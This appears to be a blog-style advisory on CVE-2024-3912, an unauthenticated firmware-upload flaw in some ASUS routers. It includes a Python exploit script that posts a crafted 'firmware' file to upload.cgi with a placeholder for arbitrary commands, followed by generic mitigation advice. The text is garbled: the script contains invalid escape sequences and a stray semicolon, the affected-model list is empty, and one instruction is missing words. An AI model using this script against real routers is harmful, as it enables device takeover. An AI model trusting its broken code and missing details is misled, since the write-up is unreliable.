CVE-2024-3912 is a vulnerability relating to certain models of ASUS routers, wherein an unauthenticated remote attacker can exploit the arbitrary firmware upload vulnerability to execute arbitrary system commands on the device. This post will delve deeper into the flaw, its exploit details, and steps that can be taken to mitigate the risk of attack. In addition, we will provide a code snippet and link to the original references for further examination of the issue.
Description
The vulnerability specifically targets the web management interface used by certain ASUS router models. The arbitrary firmware upload issue allows an attacker to send a specially crafted POST request to the device's HTTP server, circumventing any authentication mechanisms in place. Consequently, this enables the execution of arbitrary system commands on the targeted ASUS router.
Affected Router Models
The following ASUS router models have been reported to be susceptible to the CVE-2024-3912 vulnerability:
Exploit Details
To exploit the vulnerability, the attacker sends a specially crafted POST request to the device's HTTP server that mimics an authenticated firmware upload process. The arbitrary commands are then executed on the targeted router. Here is a sample code snippet demonstrating an exploit:
import requests
from io import StringIO
target_ip = "192.168.1.1"
payload = "<COMMANDS_HERE>"
firmware_data = "\x30\x82\xc\xd\x02\x01\x03\x30\x82\x9\x\x06\x09\x2a\xcc\x6a\x73\x64\x63\x12\x30\x82\x9\xe11\x90\x00\x01\x00\x19\xc\r\n\r\n" + payload
headers = {
'Content-Type': 'multipart/form-data; boundary=-----------------------------872165262'
}
data = StringIO("-------------------------------872165262\r\nContent-Disposition: form-data; name=\"file\"; filename=\"malicious_traversal.bin\"\r\nContent-Type: application/octet-stream\r\n\r\n" + firmware_data + "\r\n-------------------------------872165262--")
response = requests.post(f'http://{target_ip}/upload.cgi';, headers=headers, data=data.getvalue())
Replacein the 'payload' variable with the desired system commands to be executed on the target router.
More information pertaining to CVE-2024-3912 can be found at the following resources
- NVD - CVE-2024-3912
- Exploit Database - Exploit-DB
There are several steps users can take to protect their ASUS routers from the vulnerability
1. Update the firmware on your ASUS router to the latest version available. ASUS frequently releases firmware updates to patch vulnerabilities and improve performance. Visit the ASUS support website to check for firmware updates for your specific router model.
2. Disable the web management interface on your ASUS router if it is not necessary for your network administration tasks. Disabling the web management interface will reduce the attack surface for potential security vulnerabilities.
3. Restrict remote access to the router by enabling firewall rules that only allow connections from trusted IP addresses. Doing so will help limit unauthorized access attempts.
4. Keep an eye out for announcements regarding new ASUS router vulnerabilities and apply patches or take other appropriate mitigation steps as soon as possible.
Conclusion
CVE-2024-3912, an arbitrary firmware upload vulnerability in certain ASUS routers, allows an unauthenticated remote attacker to execute arbitrary system commands on the device. This article has provided a code snippet, exploit details, and mitigation steps to help users protect their routers from this vulnerability. By updating the firmware, disabling unnecessary features, restricting remote access, and staying informed about potential risks, users can significantly reduce the likelihood of a successful attack against their routers.
Timeline
Published on: 06/14/2024 10:15:10 UTC
Last modified on: 06/17/2024 12:42:04 UTC